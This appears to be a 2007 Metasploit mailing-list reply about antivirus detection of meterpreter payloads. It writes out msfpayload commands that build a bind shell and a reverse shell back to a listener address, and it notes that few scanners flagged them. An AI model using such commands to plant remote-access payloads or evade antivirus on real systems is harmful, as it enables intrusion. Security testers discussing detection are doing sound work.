Connect to a remote windows host with valid credentials (no exploit)

[grutz at jingojango.net (Kurt Grutzmacher)]

On Fri, Jun 01, 2007 at 04:50:23PM +0200, Nicolas FR wrote:
> - Kaspersky 6.0 detects the payload and blocks the .exe when the exploit is
> launched (warning about "Buffer Overflow"); Kaspersky does a good job on
> this, I am positively surprised.

I made a meterpreter listener and reverse and uploaded them to virustotal.com:

$ ./msfpayload windows/meterpreter/bind_tcp LPORT=5512 X > metbind-5512.exe
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.221.55.2 LPORT=5512 X > metreverse-5512.exe

Only three found them suspicious, Fortinet 2.85.0.0, Panda 9.0.0.4 and
Webwasher-Gateway 6.0.1 .. That could change in the future. Symantec 10
used to complain, not sure what changed.  :)

If only a clean EXE would be created with a real exit() call or
something. Having the debug handler kick in after doing a 'quit' really
sucks. 

-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
        "There's just no amusing way to say, 'I have a CISSP'."
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 191 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070601/90163f50/attachment.pgp>